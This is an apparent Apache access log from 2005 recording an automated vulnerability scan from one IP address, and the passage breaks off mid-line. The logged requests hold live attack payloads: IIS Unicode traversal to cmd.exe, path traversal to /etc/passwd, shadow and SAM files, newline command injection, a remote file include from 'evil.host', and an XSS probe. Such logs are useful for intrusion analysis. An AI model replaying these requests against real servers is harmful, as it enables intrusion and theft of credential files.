67.176.149.209 - - [05/Jul/2005:00:09:32 +0100] "GET HTTP://www.microsoft.com/ HTTP/1.0" 200 15162 "-" "-" 67.176.149.209 - - [05/Jul/2005:00:10:02 +0100] "\x05\x01" 501 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:10:02 +0100] "\x05\x01\x02" 501 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:10:02 +0100] "\x01" 501 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:10:02 +0100] "\x1a" 501 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:22:23 +0100] "HEAD / HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:24 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:24 +0100] "GET HTTP/1.0" 400 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:22:24 +0100] "GET HTTP/1.0" 400 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:22:25 +0100] "GET HTTP/1.0" 400 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:22:25 +0100] "GET HTTP/1.0" 400 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:22:25 +0100] "GET HTTP/1.0" 400 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:22:26 +0100] "GET HTTP/1.0" 400 - "-" "-" 67.176.149.209 - - [05/Jul/2005:00:22:26 +0100] "GET invalidfilename.php HTTP/1.0" 400 274 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:26 +0100] "GET invalidfilename.php3 HTTP/1.0" 400 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:27 +0100] "GET invalidfilename.pl HTTP/1.0" 400 273 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:27 +0100] "GET invalidfilename.asp HTTP/1.0" 400 274 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:27 +0100] "GET /invalidfilename.ida HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:28 +0100] "GET /invalidfilename.idc HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:28 +0100] "GET /invalidfilename.idq HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:28 +0100] "GET /scripts/..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:28 +0100] "GET /scripts/..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:28 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:28 +0100] "GET /scripts/..%c0%af../wint/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:28 +0100] "GET /scripts/..%c0%af../windows/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:28 +0100] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /scripts/..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:29 +0100] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /samples/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /samples/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /samples/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /samples/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 251 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:30 +0100] "GET /..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 241 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:31 +0100] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:31 +0100] "GET /samples/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /Data/settings.xml%20 HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /wra/public/wralogin/?error=61&return=password/../../../../boot.ini HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat>/etc/passwd HTTP/1.0" 403 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /acartpath/signin.asp? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /achievo/atk/javascript/class.atkdateattribute.js.php? HTTP/1.0" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET //etc/shadow%20 HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /helperfunction.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /cgi-bin/blah/classifieds/admin.cgi HTTP/1.0" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /store/agora.cgi HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /php/php4ts.dll HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /cgi-bin/build.cgi HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /store/agora.cgi HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /cgi-bin/search.cgi HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /aktivate/cgi-bin/catgy.cgi? HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:33 +0100] "GET /showcat.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cfdocs.map HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.0" 404 241 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cfide/administrator/index.cfm HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cfide/Administrator/startstop.html HTTP/1.0" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cfdocs/exampleapp/email/getfile.cfm HTTP/1.0" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /WebAdmin.dll? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /homebet/homebet.dll?form=menu&option=menu-signin HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /manpage/index.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cgi-bin/AnyForm2 HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /php/php4ts.dll HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /homebet/homebet.log HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /libs/calendrier.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /useraction.php3? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /parse_xml.cgi? HTTP/1.0" 403 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /home.php?arsc_language=elvish HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../..%20../../etc HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /ashnews.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /athenareg.php? HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /atomicboard/index.php?location=../../../../../../etc/passwd HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /mmain.html&mail_user= HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cgi-bin/athcgi.exe? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cgi-bin/ans.pl? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /axis-cgi/buffer/command.cgi? HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /user/../admin/this_axis700/this_axis700.shtml HTTP/1.0" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cgi-bin/ans.pl? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /admin/admin.shtml%20 HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /cd/../config/html/cnf_gi.htm HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /bandwidth/index.cgi? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /basilix.php3 HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /inc/sendmail.inc HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /modules/Search/index.php HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:34 +0100] "GET /modules/Submit/index.php? HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /guestbook/admin.php HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd HTTP/1.0" 403 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /vcard/admin/uninstall.php%20 HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /newtopic.php? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /Include/Start.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/betsie/parserl.pl HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /helperfunction.php?includedir=http://evil.host/code HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /gallery/captionator.php? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /php/php.exe?c:\\winnt\\repair\\sam\" HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /bigsam_guestbook.php?displayBegin=9999...9999 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/if/admin/nph-build.cgi? HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /categorie.php3? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /showproduct.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /bin/common/user_update_passwd.pl? HTTP/1.0" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /bugtest\\/ HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /bin/login.pl?course_id=\"><SCRIPT>alert()</SCRIPT> HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /jsptest.jsp\\ HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /admin/objects.inc.php4? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:36 +0100] "GET /calendar_download.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 